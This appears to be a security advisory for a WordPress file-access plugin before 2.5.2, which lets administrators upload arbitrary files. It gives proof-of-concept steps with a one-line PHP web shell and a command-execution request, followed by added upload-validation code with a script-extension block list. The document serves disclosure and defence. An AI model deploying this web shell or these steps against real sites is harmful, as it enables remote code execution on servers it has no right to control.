Prevent files / folders access < 2.5.2 - Admin+ Arbitrary File Upload

WPEX-ID: 53816136-4B1A-4B7D-B73B-08A90C2A638F
Published: 2023-08-30
Author: Dmitrii
Tags: admin privilege, file upload, php file, security exploit, process list

AI Score: 7.5 High (confidence: Low)
EPSS: 0.001 Low (percentile: 19.5%)

Description: The plugin does not validate the files it accepts for upload, which could allow an attacker with administrator access to upload arbitrary files, such as PHP scripts, to the server.

1) Create a PHP file `cmd.php` with the contents `<?php system($_GET['cmd']); ?>`
2) Go to https://example.com/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory
3) Then upload a file with the PHP extension
4) Follow the link https://example.com/wp-content/uploads/protectedfiles/(unknown).php?cmd=ps+aux
5) The response shows a list of processes, confirming that the uploaded PHP file was executed
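Upload validation that would close the gap this advisory describes, as an added example in plain PHP that is not the plugin's own code; the allowlist, the script-extension list and the storage path are assumptions:

```php
<?php
// Added example, not the plugin's code: validate an upload before it is written
// under wp-content/uploads/protectedfiles. Plain PHP, no WordPress APIs.
// $original_name and $tmp_path correspond to one entry of PHP's $_FILES array.

const ALLOWED_MIME = [   // allowlist (assumed): extension => expected content type
    'pdf' => 'application/pdf', 'png' => 'image/png', 'jpg' => 'image/jpeg',
    'jpeg' => 'image/jpeg', 'gif' => 'image/gif', 'txt' => 'text/plain',
    'zip' => 'application/zip',
];
// Extensions a web server may route to the PHP interpreter. Rejected wherever they
// appear in the name, so cmd.php.jpg is refused even though .jpg is allowed.
const SCRIPT_EXTENSIONS = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'phps'];

function validate_upload(string $original_name, string $tmp_path): array
{
    // Drop directory components and NUL bytes so the name cannot steer the path.
    $name = basename(str_replace("\0", '', $original_name));
    $segments = explode('.', strtolower($name));
    if (count($segments) < 2 || $segments[0] === '') {
        return [false, 'missing file name or extension'];
    }
    foreach (array_slice($segments, 1) as $segment) {
        if (in_array($segment, SCRIPT_EXTENSIONS, true)) {
            return [false, "script extension '$segment' is not permitted"];
        }
    }
    $ext = end($segments);
    if (!isset(ALLOWED_MIME[$ext])) {
        return [false, "extension '$ext' is not on the allowlist"];
    }
    // Sniff the stored bytes; the client-supplied Content-Type is not trusted.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmp_path);
    if ($detected !== ALLOWED_MIME[$ext]) {
        return [false, "content type '$detected' does not match .$ext"];
    }
    // Store under a random server-chosen name so the URL is not attacker-controlled.
    return [true, bin2hex(random_bytes(16)) . '.' . $ext];
}

// Constructed demo: a PHP file named cmd.php and a plain text note.
$tmp = tempnam(sys_get_temp_dir(), 'upl');
file_put_contents($tmp, "<?php echo 'x'; ?>\n");
print_r(validate_upload('cmd.php', $tmp));    // refused at the name check
file_put_contents($tmp, "quarterly notes\n");
print_r(validate_upload('notes.txt', $tmp));  // accepted under a random .txt name
unlink($tmp);
```

Reviewing the uploads directory for files that fail this check is the corresponding detection step for sites that ran an affected version.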

